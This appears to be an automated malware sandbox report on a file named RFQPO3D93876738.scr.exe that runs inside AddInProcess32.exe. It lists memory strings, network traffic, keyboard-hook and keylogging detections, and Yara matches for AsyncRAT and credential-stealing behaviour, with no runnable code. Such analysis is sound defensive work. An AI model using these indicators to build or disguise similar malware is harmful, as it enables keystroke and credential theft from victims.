Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000310F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000310F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000319D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: AddInProcess32.exe, 00000006.00000002.1554299366.000000000319D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: AddInProcess32.exe, 00000006.00000002.1572158975.0000000007B7A000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1566188160.00000000065A1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1572651872.0000000007BD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1552823705.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: AddInProcess32.exe, 00000006.00000002.1572158975.0000000007B7A000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1566188160.00000000065A1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1572651872.0000000007BD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1552823705.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AddInProcess32.exe, 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1570014475.0000000007860000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: AddInProcess32.exe, 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, cPKWk.cs

.Net Code: I3Mi2zn6x

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.AddInProcess32.exe.7200000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQPO3D93876738.scr.exe

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC493F39	0_2_00007FFAAC493F39
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC48AF80	0_2_00007FFAAC48AF80
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC48D805	0_2_00007FFAAC48D805
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC48F090	0_2_00007FFAAC48F090
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC483970	0_2_00007FFAAC483970
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC481A90	0_2_00007FFAAC481A90
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC481A88	0_2_00007FFAAC481A88
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC483AC0	0_2_00007FFAAC483AC0
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC487BE0	0_2_00007FFAAC487BE0
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC496E15	0_2_00007FFAAC496E15
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC493809	0_2_00007FFAAC493809
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC48F2B8	0_2_00007FFAAC48F2B8
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC560000	0_2_00007FFAAC560000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_013DEA78	6_2_013DEA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_013DF968	6_2_013DF968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_013D0C60	6_2_013D0C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05A95FD4	6_2_05A95FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05A98753	6_2_05A98753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05A95CC4	6_2_05A95CC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05A96BA8	6_2_05A96BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05A96BB8	6_2_05A96BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06364068	6_2_06364068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06363D20	6_2_06363D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06361888	6_2_06361888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06364938	6_2_06364938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06365DC0	6_2_06365DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B54C8	6_2_066B54C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B0040	6_2_066B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066BCE58	6_2_066BCE58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B6D40	6_2_066B6D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B2F89	6_2_066B2F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A30460	6_2_07A30460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A322F0	6_2_07A322F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A391E0	6_2_07A391E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A391D2	6_2_07A391D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A33C68	6_2_07A33C68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A33C78	6_2_07A33C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DBE1A8	6_2_07DBE1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DBF090	6_2_07DBF090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DBC070	6_2_07DBC070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DB8F28	6_2_07DB8F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DB52D0	6_2_07DB52D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DBB248	6_2_07DBB248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DBE8CF	6_2_07DBE8CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DDBFD3	6_2_07DDBFD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DD7E60	6_2_07DD7E60
